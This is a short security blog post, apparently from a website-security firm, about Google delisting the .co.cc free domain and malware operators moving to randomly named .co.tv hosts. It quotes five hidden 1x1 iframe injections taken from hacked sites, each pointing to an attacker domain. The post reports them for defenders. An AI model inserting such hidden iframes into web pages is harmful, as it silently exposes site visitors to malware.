It is being reported that Google took action against the high number of malware sites in the .co.cc domain, removing more than 11 million sites from their search results.
For us this is good news, since we haven’t been seeing anything good coming from there (only malware and spam). They did a similar thing a few weeks ago blacklisting the whole .cz.cc domain.
However, just as they blacklisted the .co.cc, we are starting to see the attackers switching tactics and using different free domains. The popular one now is .co.tv:
<iframe src="http://uhcmsgfq.co.tv/?go=1" width="1" height="1"></iframe>
<iframe src="http://yswlifofj.co.tv/?go=1" width="1" height="1"></iframe>
<iframe width="1" height="1" src="http://vmvfonc.co.tv/?go=1"></iframe>
<iframe src="http://cvfplmpsap.co.tv/?go=1" width="1" height="1"></iframe>
<iframe src="http://kwhnqxvslf.co.tv/?go=1" width="1" height="1"></iframe>
Those are just some of the malicious iframes we are seeing on hacked sites now (a few weeks ago they would have been on the .co.cc domain). As you can see by their names (vmvfonc.co.tv, kwhnqxvslf.co.tv, yswlifofj.co.tv, etc) they are random and being mass generated.
We are also seeing a lot of malware and spam in the .co.be domain range (like dumoxoveba21.co.be), but it seems Google banned the whole .co.be range as well.
What Google is doing is good, but the “war” is not over
If you are worried your site might be hacked or compromised, scan it here: http://sitecheck.sucuri.net.